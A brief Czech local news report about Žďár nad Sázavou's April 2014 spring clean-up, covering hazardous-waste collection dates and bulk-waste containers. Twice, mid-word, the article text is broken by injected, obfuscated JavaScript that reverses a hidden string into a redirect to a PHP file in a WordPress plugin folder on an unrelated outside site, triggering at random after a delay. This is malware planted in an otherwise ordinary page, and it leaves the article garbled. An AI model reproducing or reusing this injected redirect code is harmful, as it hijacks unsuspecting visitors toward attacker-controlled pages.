Rainbow page separator

Ve Žďáře příští týden vypukne jarní úklid

Neděle, 30. března 2014

Žďár nad Sázavou / Od 3. do 17. dubna žďárská radnice na území města zorganizuje jarní úklid. Ten začne ve dnech 3. až 5. dubna svozem nebezpečného odpadu. Při něm je možné odložit odpady s nebezpečnými vlastnostmi, například rádia, televizory, ledničky, plechovky, nádoby od barev, laků a ředidel, zářivky, monočlánky, akumulá["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory a jiné obaly znečištěné škodlivinami. Kompletní elektrospotřebiče, které již svým majitelům dosloužily, budou odevzdány ve zpětném odběru k dalšímu využití. Nekompletní elektrospotřebiče naopak musí být zlikvidovány na skládce nebezpečného odpadu. Obyvatelé města mohou ty["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to odpady předávat přímo na jednotlivých stanovištích svozu, jejichž seznam je společně s časovým harmonogramem zveřejněn na webu žďárské radnice. V době od 7. do 17. dubna budou ve Žďáře nad Sázavou a v jeho místních částech rozmístěny velkoobjemové kontejnery na objemný odpad a odpad ze zeleně. Odpad skončí na skládce v Ronově, zeleň pak ve žďárské bioplynové stanici.